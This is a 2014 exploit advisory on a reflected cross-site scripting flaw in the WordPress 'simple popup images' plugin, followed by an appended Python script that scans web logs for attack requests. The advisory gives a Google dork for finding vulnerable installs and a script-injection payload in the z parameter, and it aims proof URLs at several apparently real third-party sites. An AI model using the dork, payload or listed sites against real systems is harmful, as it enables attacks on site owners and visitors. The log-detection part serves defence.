|#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#|
|-------------------------------------------------------------------------|
| [*] Exploit Title: WordPress simple popup images Cross-Site Scripting Vulnerability
|
| [*] Exploit Author: Ashiyane Digital Security Team
|
| [*] Date : 2014-05-21
|
| [*] Vendor Homepage : http://www.wordpress.org
|
| [*] Google Dork: inurl:wp-content/plugins/simple-popup-images
|
| [*] Tested on: Windows 7
|
| [*] Web browser : mozilla firefox
|-------------------------------------------------------------------------|
|
| [*] Location : [localhost]/wp-content/plugins/simple-popup-images/popup.php?z=[XSS]
|
|-------------------------------------------------------------------------|
| [*] Proof:
|
| [*] http://www.itstoXpeka.com/ITSblog/wp-content/plugins/simple-popup-images/popup.php?z="/><script>alert(1);</script>
|
| [*] http://www.easyXwebcreations.com/wp-content/plugins/simple-popup-images/popup.php?z="/><script>alert(1);</script>
|
| [*] http://www.steaXlthcopter.com/blog/wp-content/plugins/simple-popup-images/popup.php?z="/><script>alert(1);</script>
|
| [*] http://www.pferdXehof-muellerschoen.de/wp-content/plugins/simple-popup-images/popup.php?z="/><script>alert(1);</script>
|
| [*] http://www.wabXei-mono.com/embroidery/wp-content/plugins/simple-popup-images/popup.php?z="/><script>alert(1);</script>
|-------------------------------------------------------------------------|
| [*] Discovered By : ACC3SS
|-------------------------------------------------------------------------|
|-------------------------------------------------------------------------|
|#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#|
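
Added example (not part of the original advisory): a log check a site operator can run to find requests that put markup into the z parameter of popup.php, including double percent-encoded forms and installs under a subdirectory. The log format (combined), the sample lines, and the rule that a legitimate z value never contains < > " ' are assumptions.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Path taken from the advisory's "Location" field; installs may sit under a subdirectory.
PLUGIN_PATH = "/wp-content/plugins/simple-popup-images/popup.php"
# Characters needed to close an attribute or open a tag (assumed heuristic).
MARKUP = re.compile(r"[<>\"']")
# Request field of a combined-format access log line.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '203.0.113.5 - - [21/May/2014:10:00:01 +0000] "GET /wp-content/plugins/simple-popup-images/popup.php?z=12 HTTP/1.1" 200 512',
    '203.0.113.9 - - [21/May/2014:10:00:07 +0000] "GET /blog/wp-content/plugins/simple-popup-images/popup.php?z=%22/%3E%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 640',
    '203.0.113.9 - - [21/May/2014:10:00:09 +0000] "GET /wp-content/plugins/simple-popup-images/popup.php?z=%2522%253E%253Cscript%253E HTTP/1.1" 200 640',
    '203.0.113.7 - - [21/May/2014:10:00:12 +0000] "GET /index.php?z=%3Cb%3E HTTP/1.1" 200 300',
]

def decode_fully(value, rounds=3):
    """Undo nested percent-encoding (e.g. %253C -> %3C -> <)."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_z(log_line):
    """Return the decoded z value if the request targets popup.php with markup in z, else None."""
    match = REQUEST.search(log_line)
    if not match:
        return None
    url = urlsplit(match.group(1))
    if not unquote(url.path).lower().endswith(PLUGIN_PATH):
        return None
    for raw in parse_qs(url.query, keep_blank_values=True).get("z", []):
        value = decode_fully(raw)  # parse_qs has already decoded one layer
        if MARKUP.search(value):
            return value
    return None

def scan(lines):
    """Return (line_number, decoded_z) for every flagged line."""
    checked = ((n, suspicious_z(line)) for n, line in enumerate(lines, start=1))
    return [(n, value) for n, value in checked if value is not None]

if __name__ == "__main__":
    for number, value in scan(SAMPLE_LOG):
        print(f"line {number}: z={value!r}")
```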